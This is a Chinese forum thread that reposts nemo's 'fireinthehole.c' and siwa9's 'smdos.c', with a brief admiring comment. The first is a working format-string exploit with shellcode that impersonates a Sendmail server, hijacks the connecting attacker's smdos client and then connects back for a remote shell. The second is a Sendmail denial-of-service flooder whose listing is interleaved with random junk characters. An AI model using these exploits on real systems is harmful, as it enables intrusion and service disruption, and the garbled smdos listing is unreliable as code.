
xi-_a_r-_ise 发表于 2008-8-22 00:05

nemo

看不到他的脸，不过看他的网站就知道他很有趣。
[url=http://felinemenace.org/~nemo/]http://felinemenace.org/~nemo/[/url]
看上面的 ASCII 画，nemo 很有趣吧……cute!
下面这个 exploit 很淫荡啊：别人的 exploit（下面贴的 smdos.c）本身有漏洞——它把邮件服务器返回的内容直接当作 fprintf 的格式串来用——他就把这个程序放在邮件服务器上狙击攻击者。
hahaha...
/* *  fireinthehole.c *   *  Counterstrike exploit for smdos (sendmail exploit) *  written by nemo (Neil Archibald) 2004 * *  Thanks to andrewg and mercy for helping me out with this. *   *    [ Need a challenge ? ] *    [ Visit [url]http://www.pulltheplug.com[/url] ] */#include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <errno.h> #include <string.h>#include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <sys/wait.h> #include <signal.h> #define SMTPPORT 25#define BANNER   "220 evil.whitehat.com ESMTP Sendmail 8.9.3\n"#define BACKLOG  50#define        MAXFMT         1024#define BSIZE         1048576 + 1  // From smdos.c ;)#define BINDPORT 65535 #define GOT      0x0804a104   // GOT to overwrite. (objdump -R smdos)#define EBPB         0xbffff914   // Address of ebp, can be seen using dpa or gdb.#define SCODEAD  0x0804a1a0   // Address of shellcode on the .bss#define DPA1         5#define DPA2     33#define DPA3     68#define counter(x)      ((a=(x)-b),(a+=(a<0?0x10000:0)),(b=(x)),a)int sin_size,evil_fd,currdpa  = 0;struct sockaddr_in my_addr,haX0r_addr;        // Address of the attacker.char shellcode[] = /* shellcode by Ilja van Sprundel ([email]ilja@netric.org[/email]) */"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x43\xff""\x49\x02\x6a\x10\x51\x50\x89\xe1\x5e\xb0\x66\xcd\x80\x89\x41\x04\xb0""\x66\x43\x43\xcd\x80\x43\xb0\x66\xcd\x80\x87\xd9\x89\xc3\xb0\x3f\xcd""\x80\x49\x79\xf9\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3"   "\x52\x53\x89\xe1\xb0\x0b\xcd\x80";               void say(char *what,int sockfd,int b_read){        char buffer[BSIZE];        bzero(buffer,BSIZE);                usleep(1000);        if (b_read && read(sockfd,buffer,BSIZE - 1) == -1)        {                perror("read()");                exit(errno);        }        if (write(sockfd,what,strlen(what)) == -1)        {                perror("write()");                exit(errno);        }}int sendfstring(int 
sockfd){        int a , b = 0;        char buffer;        char fmt[MAXFMT];        printf("[+] Sending format strings.\n");        sprintf(fmt,"%%.%du%%%d$hn",counter(GOT & 0xffff),DPA2);        sprintf(fmt,"%s%%.%du%%%d$hn\n",fmt,counter((EBPB + 2) & 0xffff),DPA1);        say(fmt,sockfd,1); b=0;        sprintf(fmt,"%%.%du%%%d$hn\n",counter(GOT >> 0x10),DPA2);        say(fmt,sockfd,1); b=0;                       sprintf(fmt,"%%.%du%%%d$hn",counter(SCODEAD & 0xffff),DPA3);        sprintf(fmt,"%s%%.%du%%%d$hn\n",fmt,counter(EBPB & 0xffff),DPA1);        say(fmt,sockfd,1); b=0;        sprintf(fmt,"%%.%du%%%d$hn\n",counter((GOT + 2) & 0xffff),DPA2);        say(fmt,sockfd,1); b=0;                     while(read(sockfd,&buffer, 1) && a++ < BSIZE);        sprintf(fmt,"%%.%du%%%d$hn\n",counter(SCODEAD >> 0x10),DPA3);        say(fmt,sockfd,1);                      return 0;}int waitonsmtp(){        int sockfd;        int yes=1;        if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {                perror("socket()");                exit(errno);        }        if (setsockopt(sockfd,SOL_SOCKET,SO_REUSEADDR,&yes,sizeof(int)) == -1) {                perror("setsockopt()");                exit(errno);        }        my_addr.sin_family = AF_INET;        my_addr.sin_port = htons(SMTPPORT);            my_addr.sin_addr.s_addr = INADDR_ANY;         memset(&(my_addr.sin_zero), '\0', 8);         if (bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) == -1) {                perror("bind()");                exit(errno);        }        if (listen(sockfd, BACKLOG) == -1) {                perror("listen()");                exit(errno);        }                return sockfd;}void shell(int sock){        fd_set fd_read;        char buff[1024];        int n;        while(1)         {                FD_SET(sock,&fd_read);                FD_SET(0,&fd_read);                if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break;                if( FD_ISSET(sock, &fd_read) ) {  
                      n=read(sock,buff,sizeof(buff));                        if (n == 0) {                                printf ("Connection closed.\n");                                exit(EXIT_FAILURE);                        } else if (n < 0) {                                perror("read remote");                                exit(EXIT_FAILURE);                        }                        write(1,buff,n);                }                if ( FD_ISSET(0, &fd_read) ) {                        if((n=read(0,buff,sizeof(buff)))<=0){                                perror ("read user");                                exit(EXIT_FAILURE);                        }                        write(sock,buff,n);                }        }        close(sock);}        int conn(char *ip, int p){        struct sockaddr_in connaddr;        int sockfd;        connaddr.sin_family = AF_INET;        connaddr.sin_port = htons(p);        connaddr.sin_addr.s_addr = inet_addr(ip);        bzero(&(connaddr.sin_zero),8);        sockfd=socket(AF_INET,SOCK_STREAM,0);        if((connect(sockfd,(struct sockaddr*)&connaddr,sizeof(struct sockaddr))) < 0 )        {                return 0;        }        return sockfd;}int main(int ac, char **av){        int sockfd,shellfd;                printf("-( fireinthehole - [ Counterstrike code for smdos ] )-\n");        printf("                   -] nemo 2004 [-\n");        sockfd = waitonsmtp();        printf("[+] Waiting for attack.....\n");        sin_size = sizeof(struct sockaddr_in);        if ((evil_fd = accept(sockfd, (struct sockaddr *)&haX0r_addr,&sin_size)) == -1) {                perror("accept");        }                printf("[+] Incoming attack from evil hacker:  %s.\n",inet_ntoa(haX0r_addr.sin_addr));        sleep(3);        printf("[+] Impersonating Sendmail. ;)\n");        if (write(evil_fd,BANNER,strlen(BANNER)) == -1)                perror("write()");        if(sendfstring(evil_fd)) // Send format string sequence to attacker.        
        perror("send()");        printf("[+] Sending payload\n");        if (send(evil_fd, shellcode, strlen(shellcode), 0) == -1)                perror("send");        sleep(5);        close(evil_fd);        printf("[+] Checking for shell\n");         if((shellfd=conn(inet_ntoa(haX0r_addr.sin_addr),BINDPORT)))        {                 printf("[+] Got sh3ll! ;)\n\n");                 shell(shellfd);         } else {                printf("[+] Exploit unsuccesful! :(\n");        }        return 0;}

xi-_a_r-_ise 发表于 2008-8-22 00:06

[url=http://felinemenace.org/~nemo/exploits/fireinthehole.c]http://felinemenace.org/~nemo/exploits/fireinthehole.c[/url]

xi-_a_r-_ise 发表于 2008-11-13 05:51

smdos.c:
--- CUT HERE ---
/*
By Michal Szymanski <[email=siwa9@box43.gnet.pl]siwa9@box43.gnet.pl[/email]>
Sendmail DoS (up to 8.9.3)
Sat Apr  3 00:12:31 CEST 1999
*/
I:Io Y]S9e #include <stdio.h>
P]u)a#lh #include <sys/types.h>
%UGiF6GKd #include <sys/socket.h>
a0CY P&B6YS7~^ #include <netinet/in.h>bg2O kD'lT
#include <arpa/inet.h>1i)V#j&~B+c
#include <netdb.h>G3^ jf+aTl%t8x`
#include <errno.h>
P1E;z*]q2C #undef VERBOSE          /* define it, if MORECONN is undefined */
3a y,w |MCc #define MORECONN Up9Plbj!Rq
// #define RCPT_TO      "[email=foo@ftp.onet.pl]foo@ftp.onet.pl[/email]"3z9W.DBT"K6P
#define RCPT_TO "[email=foo@10.255.255.255]foo@10.255.255.255[/email]"
6`TxF4m]FD/]? #ifdef MORECONN
#m!}id SEVQ5VM #define MAXCONN 5I/YE@"n@!iZ
#endif&NwkC:v
#define BSIZE   1048576         /* df* control file size */9g Uc4I&x#|)qa-u3b
#define PORT    25A6eUnRO+|Q/l6BEM
char buffer[BSIZE];
$e$R4_!} C9R int sockfd,x,loop,chpid;+tdQ3W(aH8X9sQ,V
/*
 * Print the command-line synopsis to stderr and terminate the program.
 * fname: the program name as invoked (argv[0]), echoed in the message.
 * Does not return; the process exits with status 1.
 */
void usage(char *fname)
{
        (void)fprintf(stderr, "Usage: %s <victim_host>\n", fname);
        exit(1);
}
void say(char *what) {
gH7l4{9[4b \ if (write(sockfd,what,strlen(what))<0) {
X7wg?d$}!BZ perror("write()");
~7f&iN1j exit(errno);
?&{;J y&_ }
q3WP HI9b n{4Q #ifdef VERBOSE t9}oX3LG_b1Q-q
fprintf(stderr,"<%s",what);
tTY)Q8}3Xo #endif8y_ ^s)S LjX
bzero(buffer,BSIZE);
M"QyBa W4t usleep(1000);6S"]3S vl/fHU,?
if (read(sockfd,buffer,BSIZE)<0) {H |:X$`4B&_y0VG
perror("read()");
V'A+h&~ V h exit(errno);
%P^j9{wG;k%} }
o ze.Dy3r #ifdef VERBOSE
l t9i.N"ps6rN7BN2~&X fprintf(stderr,buffer);K'J[{1wB5o S
#endifQvw-B!rd
} ~{e-T7Z!A&{ pd
int main(int argc,char *argv[]) {rS ?oomK9k
struct sockaddr_in serv_addr;V6g9Y u_M#[
struct hostent *host;
,x/N4\` w@ char *hostname,hostaddr[20];
"mY8[)l{ N&V{:mj&PL fprintf(stderr,"Sendmail DoS (up to 8.9.3) by siwa9 [[email]siwa9@box43.gnet.pl[/email]]\n");I#EvE/](Y!R]
if (argc<2) usage(argv[0]);6P V/L1rXs?
#ifdef VERBOSE~{F"yB#},d/e.Al/N%Q
fprintf(stderr,">Preparing address. \n");@ t j9{4E&]/j
#endif
{ve,w4F7l w/z hostname=argv[1];@ X"U X%}&\9Q
serv_addr.sin_port=htons(PORT);
8N4E{ l:o MbF serv_addr.sin_family=AF_INET;M!K7z*|2r$`hd |
if ((serv_addr.sin_addr.s_addr=inet_addr(hostname))==-1) {
%CdE{2l0` C #ifdef VERBOSE/j1xa%d,w;N3L X
fprintf(stderr,">Getting info from DNS.\n");e6w3B(z w2l*p
#endif
hd:n Vy"k J if ((host=gethostbyname(hostname))==NULL) {y+i:D!hLd'R
herror("gethostbyname()");"A+m%LyT}&t(c ]
exit(h_errno);
aUH!Ar? l } MSy*@9B
serv_addr.sin_family=host->h_addrtype; E kZ&\Swd(`s
bcopy(host->h_addr,(char *)&serv_addr.sin_addr,host->h_length); FhSR JeSv^+l
#ifdef VERBOSE \S.].ia
fprintf(stderr,">Official name of host: %s\n",host->h_name);
n?S @P;i/N;N #endif]#zZ#N"wGU
hostname=host->h_name;~*RIIn ZP&H.P
sprintf(hostaddr,"%d.%d.%d.%d",(unsigned char)host->h_addr[0],
!Be adM f(t                                (unsigned char)host->h_addr[1],6f3}3{L:[^,q`
                               (unsigned char)host->h_addr[2],?z} m G
                               (unsigned char)host->h_addr[3]);!oh l1?+B['Y
}`3|%d`3P
else sprintf(hostaddr,"%s",hostname);
N8Q^dh}j2V$ODz #ifdef MORECONN%A5a9qoh?;]8{(^
for (;loop<MAXCONN;loop++) if (!(chpid=fork())) {
nPBuSEoN Y #endif
%_S,f~pNmH%e8D for(;;) {
k3z ]\1jG bzero(&(serv_addr.sin_zero),8);*w&X3lmHjB
if ((sockfd=socket(AF_INET,SOCK_STREAM,0))==-1) {
&\g,y]` perror("socket()");(^E6j,N&Mg4G
exit(errno);
\Q4~$V+Y!O\ }Kw$@(T;Ta \
if ((connect(sockfd,(struct sockaddr *)&serv_addr,sizeof(serv_addr))) == -1) {cq |Xah$T%l
perror("connect()");
V1_/U:Z:q^8V$D9n0Y exit(errno);JH D~R*U9G ^
}lW"z]&HP+d
#ifdef VERBOSE
2C"U2TWe|3A m)i fprintf(stderr,">Connected to [%s:%d].\n",hostname,PORT);
s)^P$mz #endifX b+SM$fwv4x[r
bzero(buffer,BSIZE);read(sockfd,buffer,BSIZE);
%lHi#s.`yM7zg8x0^ #ifdef VERBOSEIgaSR{+w
fprintf(stderr,buffer);
3}Vu t3]Q0}7t #else0A&K,u1_c3Qg4O2K6X _
fprintf(stderr,".");*T D8V h-p
#endif
"@^f&O&p~q'Y R say("helo foo\n"); LW ]0@3FTe;i6xl
say("mail from:root@localhost\n");a[&b~ KK6A
say("rcpt to:" RCPT_TO "\n");
e8D,MS7CMb say("data\n");
Uj:i%XfW [w$BvA G for (x=0;x<=BSIZE;x++) buffer[x]='X';write(sockfd,buffer,BSIZE); tA3At8`
say("\n.\n");St2@KY0IB%T7^'SK
sleep(1);
iM:]Zo9h$\ say("quit\n");6t#\#lA0_ kW ofbt0u
shutdown(sockfd,2);
l-A2E'`6zbU close(sockfd);-Q!K}` sh"}S
#ifdef VERBOSE"@tV:N}*?G(y
fprintf(stderr,">Connection closed succesfully.\n"); x7N9H)\D }
#endif
e'nos:`^'?;z }
-oW B$Ig&Y FgG #ifdef MORECONN
e&NrOk8k6? }
!s0gUG(xq waitpid(chpid,NULL,0);'FBNF/h3O&^8?:j
#endifA_br(^.{
return 0; xDr5I/D8u
}
--- CUT HERE ---

